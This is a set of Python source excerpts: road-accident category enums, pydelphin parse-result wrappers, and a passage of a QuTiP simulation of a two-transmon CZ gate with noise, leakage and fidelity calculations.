AccidentType.A_FALL_FROM_A_MOVING_VEHICLE: "A fall from a moving vehicle",
AccidentType.FIRE: "Fire",
AccidentType.OTHER: "Other",
AccidentType.COLLISION_OF_REAR_END_TO_FRONT: "Collision of rear-end to front",
AccidentType.COLLISION_OF_REAR_END_TO_SIDE: "Collision of rear-end to side",
AccidentType.COLLISION_WITH_AN_ANIMAL: "Collision with an animal",
AccidentType.DAMAGE_CAUSED_BY_A_FALLING_LOAD_OFF_A_VEHICLE: "Damage caused by a falling load off a vehicle",
}
class DriverType(LabeledCode):
PROFESSIONAL_DRIVER = 1
PRIVATE_VEHICLE_DRIVER = 2
OTHER_DRIVER = 3
@classmethod
def labels(cls):
return {
DriverType.PROFESSIONAL_DRIVER: "professional_driver",
DriverType.PRIVATE_VEHICLE_DRIVER: "private_vehicle_driver",
DriverType.OTHER_DRIVER: "other_driver",
}
class InjuredType(LabeledCode):
PEDESTRIAN = 1
DRIVER_FOUR_WHEELS_AND_ABOVE = 2
PASSENGER_FOUR_WHEELS_AND_ABOVE = 3
DRIVER_MOTORCYCLE = 4
PASSENGER_MOTORCYCLE = 5
DRIVER_BICYCLE = 6
PASSENGER_BICYCLE = 7
DRIVER_UNKNOWN_VEHICLE = 8
PASSENGER_UNKNOWN_VEHICLE = 9
@classmethod
def labels(cls):
return {
InjuredType.PEDESTRIAN: "Pedestrian",
InjuredType.DRIVER_FOUR_WHEELS_AND_ABOVE: "Driver of a vehicle with 4 wheel or more",
InjuredType.PASSENGER_FOUR_WHEELS_AND_ABOVE: "Passenger of a vehicle with 4 wheel or more",
InjuredType.DRIVER_MOTORCYCLE: "Motorcycle driver",
InjuredType.PASSENGER_MOTORCYCLE: "Motorcycle passenger",
InjuredType.DRIVER_BICYCLE: "Bicycle driver",
InjuredType.PASSENGER_BICYCLE: "Bicycle passenger",
InjuredType.DRIVER_UNKNOWN_VEHICLE: "Driver of an unknown vehicle",
InjuredType.PASSENGER_UNKNOWN_VEHICLE: "Passenger of an unknown vehicle",
}
class CrossLocation(Enum):
UNKNOWN = 9
OUTNEAR = 1
OUTFAR = 2
YESNONE = 3
YESLIGHT = 4
@classmethod
def labels(cls):
return {
CrossLocation.UNKNOWN: "Location unknown",
CrossLocation.OUTNEAR: "Near the intersection, outside the crosswalk",
CrossLocation.OUTFAR: "Away from the intersection, outside the crosswalk",
CrossLocation.YESNONE: "In the crosswalk, without a crossing light",
CrossLocation.YESLIGHT: "In the crosswalk, with a crossing light",
}
class CrossCategory(Enum):
UNKNOWN = 0
NONE = 1
CROSSWALK = 2
def get_codes(self) -> List[int]:
"""returns CrossLocation codes of category"""
category_cross_locations = {
CrossCategory.UNKNOWN: [CrossLocation.UNKNOWN],
CrossCategory.NONE: [CrossLocation.OUTFAR, CrossLocation.OUTNEAR],
CrossCategory.CROSSWALK: [CrossLocation.YESLIGHT, CrossLocation.YESNONE],
}
return list(map(lambda x: x.value, category_cross_locations[self]))
|
from collections import Sequence
from delphin.derivation import Derivation
from delphin.tokens import YyTokenLattice
from delphin.mrs import (
Mrs,
Dmrs,
simplemrs,
eds,
)
from delphin.util import SExpr, stringtypes
class ParseResult(dict):
"""
A wrapper around a result dictionary to automate deserialization
for supported formats. A ParseResult is still a dictionary, so the
raw data can be obtained using dict access.
"""
def __repr__(self):
return 'ParseResult({})'.format(dict.__repr__(self))
def derivation(self):
"""
Deserialize and return a Derivation object for UDF- or
JSON-formatted derivation data; otherwise return the original
string.
"""
drv = self.get('derivation')
if drv is not None:
if isinstance(drv, dict):
drv = Derivation.from_dict(drv)
elif isinstance(drv, stringtypes):
drv = Derivation.from_string(drv)
return drv
def tree(self):
"""
Deserialize and return a labeled syntax tree. The tree data
may be a standalone datum, or embedded in the derivation.
"""
tree = self.get('tree')
if isinstance(tree, stringtypes):
tree = SExpr.parse(tree).data
elif tree is None:
drv = self.get('derivation')
if isinstance(drv, dict) and 'label' in drv:
def _extract_tree(d):
t = [d.get('label', '')]
if 'tokens' in d:
t.append([d.get('form', '')])
else:
for dtr in d.get('daughters', []):
t.append(_extract_tree(dtr))
return t
tree = _extract_tree(drv)
return tree
def mrs(self):
"""
Deserialize and return an Mrs object for simplemrs or
JSON-formatted MRS data; otherwise return the original string.
"""
mrs = self.get('mrs')
if mrs is not None:
if isinstance(mrs, dict):
mrs = Mrs.from_dict(mrs)
elif isinstance(mrs, stringtypes):
mrs = simplemrs.loads_one(mrs)
return mrs
def eds(self):
"""
Deserialize and return an Eds object for native- or
JSON-formatted EDS data; otherwise return the original string.
"""
_eds = self.get('eds')
if _eds is not None:
if isinstance(_eds, dict):
_eds = eds.Eds.from_dict(_eds)
elif isinstance(_eds, stringtypes):
_eds = eds.loads_one(_eds)
return _eds
def dmrs(self):
"""
Deserialize and return a Dmrs object for JSON-formatted DMRS
data; otherwise return the original string.
"""
dmrs = self.get('dmrs')
if dmrs is not None:
if isinstance(dmrs, dict):
dmrs = Dmrs.from_dict(dmrs)
return dmrs
class ParseResponse(dict):
"""
A wrapper around the response dictionary for more convenient
access to results.
"""
_result_factory = ParseResult
def __repr__(self):
return 'ParseResponse({})'.format(dict.__repr__(self))
def results(self):
"""Return ParseResult objects for each result."""
return [self._result_factory(r) for r in self.get('results', [])]
def result(self, i):
"""Return a ParseResult object for the *i*th result."""
return self._result_factory(self.get('results', [])[i])
def tokens(self, tokenset='internal'):
"""
Deserialize and return a YyTokenLattice object for the
initial or internal token set, if provided, from the YY
format or the JSON-formatted data; otherwise return the
original string.
Args:
tokenset: either `initial` or `internal` (default: `internal`)
"""
toks = self.get('tokens', {}).get(tokenset)
if toks is not None:
if isinstance(toks, stringtypes):
toks = YyTokenLattice.from_string(toks)
elif isinstance(toks, Sequence):
toks = YyTokenLattice.from_list(toks)
return toks
|
<reponame>ZW7436/PycQED_py3
"""
April 2018
Simulates the trajectory implementing a CZ gate.
June 2018
Included noise in the simulation.
July 2018
Added distortions to simulation.
"""
import time
import numpy as np
import qutip as qtp
from pycqed.measurement import detector_functions as det
from scipy.interpolate import interp1d
from pycqed.measurement.waveform_control_CC import waveform as wf
import scipy
import matplotlib.pyplot as plt
#np.set_printoptions(threshold=np.inf)
# operators
b = qtp.tensor(qtp.destroy(3), qtp.qeye(3)) # LSB is static qubit
a = qtp.tensor(qtp.qeye(3), qtp.destroy(3))
n_q0 = a.dag() * a
n_q1 = b.dag() * b
H_coupling = (a.dag() + a) * (b + b.dag())
H_c = n_q0
scalefactor=1e6
'''
alpha_q0 = -285e6 * 2*np.pi
alpha_q1 = -310e6 * 2*np.pi
w_q0 = 5.11e9 * 2*np.pi # Higher frequency qubit (fluxing) qubit
w_q1 = 4.10e9 * 2*np.pi # Lower frequency
J = 2.9e6 * 2 * np.pi # coupling strength
# caracteristic timescales for jump operators
T1_q0=34e-6
T1_q1=42e-6
Tphi_q0_ket0toket0=0 # here useless parameters
Tphi_q0_ket1toket1=0
Tphi_q0_ket2toket2=0
Tphi_q1_ket0toket0=0
Tphi_q1_ket1toket1=0
T2_q0=23e-6 # these two are the coherence times for q0 and q1 as qubits
T2_q1=23e-6
Tphi_q0_sigmaZ_01=1/(-1/(2*T1_q0)+1/T2_q0) # extracting Tphi which is not the Tphi above
Tphi_q0_sigmaZ_12=Tphi_q0_sigmaZ_01 # we will assume for the moment that the pure decoherence
# is caused by wiggles in the frequency, which cause
# a fluctuation half as large for 02 wrt 01 and 12
# (ignoring the anharmonicity)
Tphi_q0_sigmaZ_02=Tphi_q0_sigmaZ_01/2
Tphi_q1_sigmaZ_01=1/(-1/(2*T1_q1)+1/T2_q1)
'''
# Hamiltonian
def coupled_transmons_hamiltonian(w_q0, w_q1, alpha_q0, alpha_q1, J, w_bus):
"""
Hamiltonian of two coupled anharmonic transmons.
Because the intention is to tune one qubit into resonance with the other,
the number of levels is limited.
q1 -> static qubit, 3-levels
q0 -> fluxing qubit, 3-levels
intended avoided crossing:
11 <-> 02 (q1 is the first qubit and q0 the second one)
N.B. the frequency of q0 is expected to be larger than that of q1
w_q0 > w_q1
and the anharmonicities alpha negative
"""
eps=0
delta_q1=w_q1-w_bus
delta_q0_interactionpoint=(w_q1-alpha_q0)-w_bus
delta_q0=(w_q0+eps)-w_bus
J_new = J / ((delta_q1+delta_q0_interactionpoint)/(delta_q1*delta_q0_interactionpoint)) * (delta_q1+delta_q0)/(delta_q1*delta_q0)
H_0 = w_q0 * n_q0 + w_q1 * n_q1 + \
1/2*alpha_q0*(a.dag()*a.dag()*a*a) + 1/2*alpha_q1*(b.dag()*b.dag()*b*b) +\
J_new * (a.dag() + a) * (b + b.dag())
return H_0
def hamiltonian_timedependent(H_0,eps,w_bus):
w_q0=np.real(H_0[1,1])
w_q1=np.real(H_0[3,3])
alpha_q0=np.real(H_0[2,2])-2*w_q0
J=np.real(H_0[1,3])
delta_q1=w_q1-w_bus
delta_q0_sweetspot=(w_q0)-w_bus
delta_q0=(w_q0+eps)-w_bus
J_new = J / ((delta_q1+delta_q0_sweetspot)/(delta_q1*delta_q0_sweetspot)) * (delta_q1+delta_q0)/(delta_q1*delta_q0)
return H_0+eps*H_c+(J_new-J)*H_coupling
#H_0 = coupled_transmons_hamiltonian(w_q0=w_q0, w_q1=w_q1, alpha_q0=alpha_q0,alpha_q1=alpha_q1,J=J)
# target in the case with no noise
# note that the Hilbert space is H_q1 /otimes H_q0
# so the ordering of basis states below is 00,01,02,10,11,12,20,21,22
U_target = qtp.Qobj([[1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1]],
type='oper',
dims=[[3, 3], [3, 3]])
#U_target._type = 'oper'
U_target_diffdims = qtp.Qobj([[1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1]],
type='oper',
dims=[[9], [9]]) # otherwise average_gate_fidelity doesn't work
# if there is noise the target is the corresponding superoperator
U_super_target = qtp.to_super(U_target)
'''
remember that qutip uses the Liouville (matrix) representation for superoperators,
with column stacking.
This means that
rho_{xy,x'y'}=rho[3*x+y,3*x'+y']
rho_{xy,x'y'}=operator_to_vector(rho)[3*x+y+27*x'+9*y'] VERIFY
where xy is the row and x'y' is the column
'''
def plot(x_plot_vec,y_plot_vec,title='No title',xlabel='No xlabel',ylabel='No ylabel',legend_labels=list(),yscale='linear'):
if isinstance(y_plot_vec,list):
y_length=len(y_plot_vec)
else:
y_length=np.size(y_plot_vec)
if legend_labels==[]:
legend_labels=np.arange(y_length)
for i in range(y_length):
if isinstance(y_plot_vec[i],list):
y_plot_vec[i]=np.array(y_plot_vec[i])
if isinstance(legend_labels[i],int):
legend_labels[i]=str(legend_labels[i])
if len(x_plot_vec)==1:
if isinstance(x_plot_vec[0],list):
x_plot_vec[0]=np.array(x_plot_vec[0])
plt.plot(x_plot_vec[0], y_plot_vec[i], label=legend_labels[i])
else:
if isinstance(x_plot_vec[i],list):
x_plot_vec[i]=np.array(x_plot_vec[i])
plt.plot(x_plot_vec[i], y_plot_vec[i], label=legend_labels[i])
plt.legend()
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.yscale(yscale)
plt.show()
def jump_operators(T1_q0,T1_q1,Tphi_q0_ket0toket0,Tphi_q0_ket1toket1,Tphi_q0_ket2toket2,Tphi_q1_ket0toket0,Tphi_q1_ket1toket1,
Tphi_q0_sigmaZ_01,Tphi_q0_sigmaZ_12,Tphi_q0_sigmaZ_02,Tphi_q1_sigmaZ_01,Tphi_q1_sigmaZ_12,Tphi_q1_sigmaZ_02):
# time independent case
c_ops=[]
if T1_q0 != 0:
c_ops.append(np.sqrt(1/T1_q0)*a)
if T1_q1 != 0:
c_ops.append(np.sqrt(1/T1_q1)*b)
if Tphi_q0_ket0toket0 != 0:
collapse=qtp.tensor(qtp.qeye(3),qtp.ket2dm(qtp.basis(3,0)))
c_ops.append(np.sqrt(1/Tphi_q0_ket0toket0)*collapse)
if Tphi_q0_ket1toket1 != 0:
collapse=qtp.tensor(qtp.qeye(3),qtp.ket2dm(qtp.basis(3,1)))
c_ops.append(np.sqrt(1/Tphi_q0_ket1toket1)*collapse)
if Tphi_q0_ket2toket2 != 0:
collapse=qtp.tensor(qtp.qeye(3),qtp.ket2dm(qtp.basis(3,2)))
c_ops.append(np.sqrt(1/Tphi_q0_ket2toket2)*collapse)
if Tphi_q1_ket0toket0 != 0:
collapse=qtp.tensor(qtp.ket2dm(qtp.basis(3,0)),qtp.qeye(3))
c_ops.append(np.sqrt(1/Tphi_q1_ket0toket0)*collapse)
if Tphi_q1_ket1toket1 != 0:
collapse=qtp.tensor(qtp.ket2dm(qtp.basis(3,1)),qtp.qeye(3))
c_ops.append(np.sqrt(1/Tphi_q1_ket1toket1)*collapse)
if Tphi_q0_sigmaZ_01 != 0:
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,-1,0],
[0,0,0]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append(np.sqrt(1/(2*Tphi_q0_sigmaZ_01))*collapse)
if Tphi_q0_sigmaZ_12 != 0:
sigmaZinqutrit = qtp.Qobj([[0,0,0],
[0,1,0],
[0,0,-1]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append(np.sqrt(1/(2*Tphi_q0_sigmaZ_12))*collapse)
if Tphi_q0_sigmaZ_02 != 0:
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,0,0],
[0,0,-1]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append(np.sqrt(1/(2*Tphi_q0_sigmaZ_02))*collapse)
if Tphi_q1_sigmaZ_01 != 0:
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,-1,0],
[0,0,0]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(np.sqrt(1/(2*Tphi_q1_sigmaZ_01))*collapse)
if Tphi_q1_sigmaZ_12 != 0:
sigmaZinqutrit = qtp.Qobj([[0,0,0],
[0,1,0],
[0,0,-1]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(np.sqrt(1/(2*Tphi_q1_sigmaZ_12))*collapse)
if Tphi_q1_sigmaZ_02 != 0:
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,0,0],
[0,0,-1]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(np.sqrt(1/(2*Tphi_q1_sigmaZ_02))*collapse)
return c_ops
#c_ops=jump_operators(T1_q0,T1_q1,Tphi_q0_ket0toket0,Tphi_q0_ket1toket1,Tphi_q0_ket2toket2,Tphi_q1_ket0toket0,Tphi_q1_ket1toket1,
# Tphi_q0_sigmaZ_01,Tphi_q0_sigmaZ_12,Tphi_q0_sigmaZ_02,Tphi_q1_sigmaZ_01)
def c_ops_interpolating(T1_q0,T1_q1,Tphi01_q0_vec,Tphi01_q1):
# case where the pure decoherence for qubit q0 is time dependent, or better pulse-amplitude dependent
c_ops=[]
if T1_q0 != 0:
c_ops.append(np.sqrt(1/T1_q0)*a)
if T1_q1 != 0:
c_ops.append(np.sqrt(1/T1_q1)*b)
if Tphi01_q1 != 0: # we automatically put also the decoherence for 12 and 02
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,-1,0],
[0,0,0]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(collapse*np.sqrt(1/(2*Tphi01_q1)))
Tphi12_q1=Tphi01_q1
sigmaZinqutrit = qtp.Qobj([[0,0,0],
[0,1,0],
[0,0,-1]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(collapse*np.sqrt(1/(2*Tphi12_q1)))
Tphi02_q1=Tphi01_q1/2
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,0,0],
[0,0,-1]])
collapse=qtp.tensor(sigmaZinqutrit,qtp.qeye(3))
c_ops.append(collapse*np.sqrt(1/(2*Tphi02_q1)))
if Tphi01_q0_vec != []: # we automatically put also the decoherence for 12 and 02
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,-1,0],
[0,0,0]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append([collapse,np.sqrt(1/(2*Tphi01_q0_vec))])
Tphi12_q0_vec=Tphi01_q0_vec
sigmaZinqutrit = qtp.Qobj([[0,0,0],
[0,1,0],
[0,0,-1]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append([collapse,np.sqrt(1/(2*Tphi12_q0_vec))])
Tphi02_q0_vec=Tphi01_q0_vec/2
sigmaZinqutrit = qtp.Qobj([[1,0,0],
[0,0,0],
[0,0,-1]])
collapse=qtp.tensor(qtp.qeye(3),sigmaZinqutrit)
c_ops.append([collapse,np.sqrt(1/(2*Tphi02_q0_vec))])
return c_ops
def rotating_frame_transformation(U, t: float,
w_q0: float=0, w_q1: float =0):
"""
Transforms the frame of the unitary according to
U' = U_{RF}*U*U_{RF}^dag
with
U_{RF} = e^{-i w_q0 a^dag a t } otimes e^{-i w_q1 b^dag b t }
Args:
U (QObj): Unitary to be transformed
t (float): time at which to transform
w_q0 (float): freq of frame for q0
w_q1 (float): freq of frame for q1
"""
U_RF = (1j*w_q0*n_q0*t).expm() * (1j*w_q1*n_q1*t).expm()
U_prime = U_RF * U
""" U_RF only on one side because that's the operator that
satisfies the Schroedinger equation in the interaction picture.
Anyway we won't use this function.
In case we would need to rotate in the new picture the jump operators as well !
"""
return U_prime
def phases_from_superoperator(U):
"""
Returns the phases from the unitary or superoperator U
"""
if U.type=='oper':
phi_00 = np.rad2deg(np.angle(U[0, 0])) # expected to equal 0 because of our
# choice for the energy, not because of rotating frame
phi_01 = np.rad2deg(np.angle(U[1, 1]))
phi_10 = np.rad2deg(np.angle(U[3, 3]))
phi_11 = np.rad2deg(np.angle(U[4, 4]))
phi_02 = np.rad2deg(np.angle(U[2, 2])) # used only for avgatefid_superoperator_phasecorrected
phi_20 = np.rad2deg(np.angle(U[6, 6]))
phi_cond = (phi_11 - phi_01 - phi_10 + phi_00) % 360
# notice the + even if it is irrelevant
return phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond
elif U.type=='super':
phi_00 = 0 # we set it to 0 arbitrarily but it is actually not knowable
phi_01 = np.rad2deg(np.angle(U[1, 1])) # actually phi_01-phi_00
phi_10 = np.rad2deg(np.angle(U[3, 3]))
phi_11 = np.rad2deg(np.angle(U[4, 4]))
phi_02 = np.rad2deg(np.angle(U[2, 2]))
phi_20 = np.rad2deg(np.angle(U[6, 6]))
phi_cond = (phi_11 - phi_01 - phi_10 + phi_00) % 360 # still the right formula
# independently from phi_00
return phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond
# !!! check that this is a good formula for superoperators: there is a lot of redundancy
# there if the evolution is unitary, but not necessarily if it's noisy!
def pro_avfid_superoperator_compsubspace(U,L1):
"""
Average process (gate) fidelity in the qubit computational subspace for two qutrits
Leakage has to be taken into account, see Woods & Gambetta
"""
if U.type=='oper':
inner = U.dag()*U_target
part_idx = [0, 1, 3, 4] # only computational subspace
ptrace = 0
for i in part_idx:
ptrace += inner[i, i]
dim = 4 # 2 qubits comp subspace
return np.real(((np.abs(ptrace))**2+dim*(1-L1))/(dim*(dim+1)))
elif U.type=='super':
kraus_form = qtp.to_kraus(U)
dim=4 # 2 qubits in the computational subspace
part_idx = [0, 1, 3, 4] # only computational subspace
psum=0
for A_k in kraus_form:
ptrace = 0
inner = U_target_diffdims.dag()*A_k # otherwise dimension mismatch
for i in part_idx:
ptrace += inner[i, i]
psum += (np.abs(ptrace))**2
return np.real((dim*(1-L1) + psum) / (dim*(dim + 1)))
def pro_avfid_superoperator_compsubspace_phasecorrected(U,L1,phases):
"""
Average process (gate) fidelity in the qubit computational subspace for two qutrits
Leakage has to be taken into account, see Woods & Gambetta
The phase is corrected with Z rotations considering both transmons as qubits
"""
Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],
[0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],
[0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0],
[0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],
[0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],
[0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0],
[0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0],
[0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[1])), 0],
[0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0]))]],
type='oper',
dims=[[3, 3], [3, 3]])
if U.type=='oper':
U=Ucorrection*U
inner = U.dag()*U_target
part_idx = [0, 1, 3, 4] # only computational subspace
ptrace = 0
for i in part_idx:
ptrace += inner[i, i]
dim = 4 # 2 qubits comp subspace
return np.real(((np.abs(ptrace))**2+dim*(1-L1))/(dim*(dim+1)))
elif U.type=='super':
U=qtp.to_super(Ucorrection)*U
kraus_form = qtp.to_kraus(U)
dim=4 # 2 qubits in the computational subspace
part_idx = [0, 1, 3, 4] # only computational subspace
psum=0
for A_k in kraus_form:
ptrace = 0
inner = U_target_diffdims.dag()*A_k # otherwise dimension mismatch
for i in part_idx:
ptrace += inner[i, i]
psum += (np.abs(ptrace))**2
return np.real((dim*(1-L1) + psum) / (dim*(dim + 1)))
def leakage_from_superoperator(U):
if U.type=='oper':
"""
Calculates leakage by summing over all in and output states in the
computational subspace.
L1 = 1- 1/2^{number computational qubits} sum_i sum_j abs(|<phi_i|U|phi_j>|)**2
"""
sump = 0
for i in range(4):
for j in range(4):
bra_i = qtp.tensor(qtp.ket([i//2], dim=[3]),
qtp.ket([i % 2], dim=[3])).dag()
ket_j = qtp.tensor(qtp.ket([j//2], dim=[3]),
qtp.ket([j % 2], dim=[3]))
p = np.abs((bra_i*U*ket_j).data[0, 0])**2
sump += p
sump /= 4 # divide by dimension of comp subspace
L1 = 1-sump
return L1
elif U.type=='super':
"""
Calculates leakage by summing over all in and output states in the
computational subspace.
L1 = 1- 1/2^{number computational qubits} sum_i sum_j Tr(rho_{x'y'}C_U(rho_{xy}))
where C is U in the channel representation
"""
sump = 0
for i in range(4):
for j in range(4):
ket_i = qtp.tensor(qtp.ket([i//2], dim=[3]),
qtp.ket([i % 2], dim=[3])) #notice it's a ket
rho_i=qtp.operator_to_vector(qtp.ket2dm(ket_i))
ket_j = qtp.tensor(qtp.ket([j//2], dim=[3]),
qtp.ket([j % 2], dim=[3]))
rho_j=qtp.operator_to_vector(qtp.ket2dm(ket_j))
p = (rho_i.dag()*U*rho_j).data[0, 0]
sump += p
sump /= 4 # divide by dimension of comp subspace
sump=np.real(sump)
L1 = 1-sump
return L1
def seepage_from_superoperator(U):
"""
Calculates seepage by summing over all in and output states outside the
computational subspace.
L1 = 1- 1/2^{number non-computational states} sum_i sum_j abs(|<phi_i|U|phi_j>|)**2
"""
if U.type=='oper':
sump = 0
for i_list in [[0,2],[1,2],[2,0],[2,1],[2,2]]:
for j_list in [[0,2],[1,2],[2,0],[2,1],[2,2]]:
bra_i = qtp.tensor(qtp.ket([i_list[0]], dim=[3]),
qtp.ket([i_list[1]], dim=[3])).dag()
ket_j = qtp.tensor(qtp.ket([j_list[0]], dim=[3]),
qtp.ket([j_list[1]], dim=[3]))
p = np.abs((bra_i*U*ket_j).data[0, 0])**2 # could be sped up
sump += p
sump /= 5 # divide by number of non-computational states
L1 = 1-sump
return L1
elif U.type=='super':
sump = 0
for i_list in [[0,2],[1,2],[2,0],[2,1],[2,2]]:
for j_list in [[0,2],[1,2],[2,0],[2,1],[2,2]]:
ket_i = qtp.tensor(qtp.ket([i_list[0]], dim=[3]),
qtp.ket([i_list[1]], dim=[3]))
rho_i=qtp.operator_to_vector(qtp.ket2dm(ket_i))
ket_j = qtp.tensor(qtp.ket([j_list[0]], dim=[3]),
qtp.ket([j_list[1]], dim=[3]))
rho_j=qtp.operator_to_vector(qtp.ket2dm(ket_j))
p = (rho_i.dag()*U*rho_j).data[0, 0]
sump += p
sump /= 5 # divide by number of non-computational states
sump=np.real(sump)
L1 = 1-sump
return L1
def pro_avfid_superoperator(U):
"""
Average process (gate) fidelity in the whole space for two qutrits
"""
if U.type=='oper':
ptrace = np.abs((U.dag()*U_target).tr())**2
dim = 9 # dimension of the whole space
return np.real((ptrace+dim)/(dim*(dim+1)))
elif U.type=='super':
return np.real(qtp.average_gate_fidelity(U,target=U_target_diffdims))
def pro_avfid_superoperator_phasecorrected(U,phases):
"""
Average process (gate) fidelity in the whole space for a qubit and qutrit
Qubit Z rotation and qutrit "Z" rotations are applied, taking into account the anharmonicity as well
"""
Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],
[0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],
[0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1])), 0, 0, 0, 0, 0, 0],
[0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],
[0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],
[0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[2]-phases[0])), 0, 0, 0],
[0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5])), 0, 0],
[0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5]+phases[1]-phases[0])), 0],
[0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[5]-phases[0]))]],
type='oper',
dims=[[3, 3], [3, 3]])
if U.type=='oper':
U=Ucorrection*U
ptrace = np.abs((U.dag()*U_target).tr())**2
dim = 9 # dimension of the whole space
return np.real((ptrace+dim)/(dim*(dim+1)))
elif U.type=='super':
U=qtp.to_super(Ucorrection)*U
return np.real(qtp.average_gate_fidelity(U,target=U_target_diffdims))
#tlist = np.arange(0, 240e-9, 1/2.4e9)
def matrix_change_of_variables(H_0):
eigs,eigvectors=H_0.eigenstates()
eigvectors_ordered_according2basis = []
eigvectors_ordered_according2basis.append(eigvectors[0].full()) # 00 state
eigvectors_ordered_according2basis.append(eigvectors[2].full()) # 01 state
eigvectors_ordered_according2basis.append(eigvectors[5].full()) # 02 state
eigvectors_ordered_according2basis.append(eigvectors[1].full()) # 10 state
eigvectors_ordered_according2basis.append(eigvectors[4].full()) # 11 state
eigvectors_ordered_according2basis.append(eigvectors[7].full()) # 12 state
eigvectors_ordered_according2basis.append(eigvectors[3].full()) # 20 state
eigvectors_ordered_according2basis.append(eigvectors[6].full()) # 21 state
eigvectors_ordered_according2basis.append(eigvectors[8].full()) # 22 state
S=np.hstack(eigvectors_ordered_according2basis)
return S
def simulate_quantities_of_interest_superoperator(H_0, tlist, c_ops, w_bus, eps_vec,
sim_step,
verbose: bool=True):
"""
Calculates the quantities of interest from the propagator U
Args:
H_0 (Qobj): static hamiltonian, see "coupled_transmons_hamiltonian"
for the expected form of the Hamiltonian.
tlist (array): times in s, describes the x component of the
trajectory to simulate
c-ops (list of Qobj): list of jump operators, time-independent at the momennt
eps_vec(array): detuning describes the y-component of the trajectory
to simulate.
Returns
phi_cond (float): conditional phase (deg)
L1 (float): leakage
L2 (float): seepage
avgatefid (float): average gate fidelity in full space
avgatefid_compsubspace (float): average gate fidelity only in the computational subspace
"""
# time is multiplied by scalefactor and frequency is divided by it
tlist=tlist*scalefactor
eps_vec=eps_vec/scalefactor
sim_step=sim_step*scalefactor
H_0=H_0/scalefactor
w_bus=w_bus/scalefactor
if c_ops!=[]: # c_ops is a list of either operators or lists where the first element is
# an operator and the second one is a list of the (time-dependent) coefficients
for c in range(len(c_ops)):
if isinstance(c_ops[c],list):
c_ops[c][1]=c_ops[c][1]/np.sqrt(scalefactor)
else:
c_ops[c]=c_ops[c]/np.sqrt(scalefactor)
''' # step of 1/sampling_rate=1/2.4e9=0.4 ns seems good by itself
sim_step_new=sim_step*2
eps_interp = interp1d(tlist, eps_vec, fill_value='extrapolate')
tlist_new = (np.linspace(0, np.max(tlist), 576/2))
eps_vec_new=eps_interp(tlist_new)
c_ops_new=[]
for c in range(len(c_ops)):
if isinstance(c_ops[c],list):
c_ops_interp=interp1d(tlist,c_ops[c][1], fill_value='extrapolate')
c_ops_new.append([c_ops[c][0],c_ops_interp(tlist_new)])
else:
c_ops_new.append(c_ops[c])
# function only exists to wrap
#def eps_t(t, args=None):
# return eps_interp(t)
print(len(eps_vec),len(eps_vec_new))
t0 = time.time()
exp_L_total_new=1
for i in range(len(tlist_new)):
